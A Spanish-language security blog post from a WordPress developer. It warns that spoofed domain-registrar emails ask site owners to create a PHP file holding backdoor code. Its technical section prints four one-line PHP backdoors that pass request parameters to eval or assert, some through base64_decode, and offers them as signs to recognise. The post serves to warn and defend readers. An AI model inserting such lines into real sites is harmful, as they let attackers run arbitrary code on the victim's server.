Security Blog
Security Blog
Posted By Gregory

No confíes en esos correos electrónicos falsos de confirmación de dominio

Si alguna vez recibe una carta de cualquier tipo que le solicite crear, descargar o instalar algún código PHP en su sitio web, debe ignorarla.


English version: Do not trust those fake domain confirmation emails


Recientemente, algunos de mis clientes recibieron correos electrónicos extraños de sus registradores de dominio. Estos correos contenían una solicitud de confirmación de sus dominios. Revisé uno de ellos y rápidamente lo identifiqué como fraudulento . Todos los correos tienen un patrón idéntico y una solicitud para crear un archivo PHP en la carpeta raíz de un sitio web con un nombre específico y el contenido indicado. Huelga decir que el contenido sugerido para ese archivo PHP contiene código malicioso conocido como código de puerta trasera. Este tipo de código permite al atacante ejecutar cualquier acción en el sitio web de la víctima.

Si alguna vez recibes una carta que te pide crear, descargar o instalar código PHP en tu sitio web, ignórala. Sin excepciones. Incluso si la carta viene del presidente o de tu madre.

Los correos fraudulentos parecen legítimos porque su dirección de correo electrónico del remitente es legítima. Sin embargo, se trata de una suplantación de identidad. No esperas recibir un correo electrónico falso de tus amigos ni de tu registrador de dominio. ¿Verdad? ¡No! Cualquier correo electrónico puede contener cualquier dirección del remitente. La gran mayoría de los servidores y clientes de correo electrónico no comprueban ni verifican la dirección del remitente. Por lo tanto, lo consideras un hacker. No confíes en ningún correo electrónico que recibas de un remitente conocido si contiene una solicitud para realizar alguna acción sospechosa, como instalar código en tu sitio web o aplicación.

Detalles técnicos

Los correos electrónicos falsos suelen contener algunas de las siguientes líneas PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Para su información: base64_decode, eval y assert son marcadores bien conocidos de código PHP sospechoso o malicioso.

Ver también: Plugin Inspector revela problemas de seguridad con otros complementos


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.